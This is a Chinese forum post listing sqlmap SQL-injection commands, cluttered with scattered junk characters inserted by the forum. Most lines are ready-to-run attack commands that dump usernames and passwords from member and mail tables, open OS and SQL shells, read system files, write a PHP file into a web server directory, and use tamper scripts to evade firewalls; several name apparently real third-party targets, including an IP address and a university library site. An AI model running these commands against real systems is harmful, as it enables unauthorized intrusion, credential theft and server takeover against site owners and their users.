找回密码
 立即注册
查看: 2611|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap
9 A: K$ N6 K% z& ~( l2 P/ d3 @0 x3 D6 ~' j6 m% v8 g- D
update :::::>     in the folder   after  execute    following   order : svn update! M+ E, C# b7 r. q# M

3 w3 y9 ]+ _! c1 m) U2 N+ K- isqlmap.py -r 1.txt --current-db
4 J$ P( \  S5 f. x9 N
. u/ Q4 ^9 b8 V3 Dv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
6 g) S1 f/ n/ h  x7 k' k8 `8 L* ^1 X9 q3 _
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) 8 R) P$ }% O0 ~; H
猜解数据库
: q' n2 t, i3 s./sqlmap.py -u "injection-url" --dbs
! I) }9 x: R: D# Lsqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
' d) m9 D* Z. A( y3 f( k! G( M. r( \
猜解表名
' d) p6 E1 f) t9 A* w" l./sqlmap.py -u "injection-url" -D database_name --tables
; a$ p8 q( a$ _8 H1 j8 g: V/ Z0 H
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"- R* v$ G0 [) d  H8 G$ t; d
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" 5 |! w) L7 f, F
( z4 h2 ^+ F) G3 A
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump/ z7 |% o; ~+ I, ]  V, o0 i0 ]
) o( _  Z* t! C8 G* k* R
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py": B$ ^+ G4 D1 S) Z3 c
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"! m' g# u, i2 Z0 K' D( Q
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
/ O  l8 o' b8 G; o0 `sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"* T% [/ a/ p+ M7 E% r; W

6 M3 n% ~9 |- }' `% lsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
7 T. Y7 n1 |# v: Q4 H1 Qsqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"* ^# r$ P7 X# l  [
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py": q2 s  Y. O; t' ^# r; ?, {) o
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"' e4 G0 ^9 F, w/ ~4 l
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
' z1 q9 B* f+ z9 y3 o: @7 B  g6 T- L3 j. q2 W
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了- E+ L  O0 f5 r* b2 S
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"/ N. F2 D% V5 s; q

; K# B% b; ^. m9 W- F( ^/ x5 }5 x) Rsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"" N; M( [- c/ }+ T% b4 w  J3 o" O
猜解列名
& b4 |9 p& s7 f0 E./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
: i+ [' g, l' J2 Z8 d2 t0 J/ g9 R4 ?( p+ W. e9 n
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
  l+ T; y: y7 |6 g  l- {& ?" dsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" 8 M) @. i% J4 z* X: I: a' ?% d) K
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
  M( A  E/ S' P. x, b
( ~! z5 ]: u2 F' d/ M4 Hsqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
) N; e* H% w, s7 N7 S! e2 H&submit=Go2 R$ s' Y8 r% ^7 |9 L
猜解值! S9 }1 n/ [1 D
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
! S# ~+ Y& K+ f- h. n2 t========================================================
* e8 ?: k% ?  e& r" t8 m. E搜索表名中包括mana字符的2 ?) `# K# G; T+ D6 ]! ?3 }+ `
/sqlmap.py -u "injection-url" -T mana --search
+ v5 W$ x; O3 {& K/ f& E2 J返回一个交互式sql shell. |. r+ G9 ?- Z1 M+ Q* i- M" N9 v
/sqlmap.py -u "injection-url" --sql-shell
( K8 v; y) J* t- U5 I0 N' r读取指定文件(需权限)" s$ x5 j  F4 {1 n! A. ?
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
8 T% X6 a' U; o9 y7 X/ m+ G" j查看当前 用户 及 数据库 5 @; E8 R1 E9 r" {6 {& [0 R
/sqlmap.py -u "injection-url" --current-user --current-db# `. ?, u: o- n% F! [* q
本地文件 写入 远程目标绝对路径' m$ f& K9 _1 ~1 T5 f/ e3 L
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
, B* M2 t7 @$ U* nsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" ! J: P7 \8 g; I, o7 j

! ]7 v; t) V- u3 dsqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
7 K+ U, c$ d  _6 X查看某用的权限- k" ?& Z) e9 ]! I6 d2 a) c0 k
/sqlmap.py -u "injection-url" --privileges -U root/ p  _, Z$ t1 F7 b4 G( M
查看当前用户是否为dba9 J, n4 W% K* F# ^$ V
/sqlmap.py -u "injection-url" --is-dba7 E' j7 s  E# |2 y( f& W1 p9 L
读取所有数据库用户或指定数据库用户的密码
8 b# b% R7 D$ G6 ]: K7 i2 lsqlmap.py -r 1.txt --users --passwords
* N+ K' i0 J& G4 g7 Psqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
  ?4 j/ Y5 x6 X- n5 X: J
) e% W+ G7 ~' I# U: R0 B. _/sqlmap.py -u "injection-url" --passwords -U root
/ s+ M* r$ R5 W2 V$ W+ Y# [) G- ]8 W8 K* w  o1 j1 m
--start&&--stop 与 --first&&--last 的区别% z! ?' |% e& ^4 g2 _9 b, t: Q& s4 n
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
- {2 Q* o; d+ E7 M3 v, ~) A5 J7 ]$ x" i
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
+ B, h6 J- I0 Q( b/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables7 T4 i5 m% c& f7 M( I3 L! i) r4 t
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
  E) L1 g5 L4 q; v8 E% B  }( I; f% A/ o: f+ Y
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
5 Q8 a/ R$ u7 ?8 |0 v: f/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip") B0 w6 Y% `; S( \: K1 Y
3 s6 a# X1 _: q# D+ x" f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表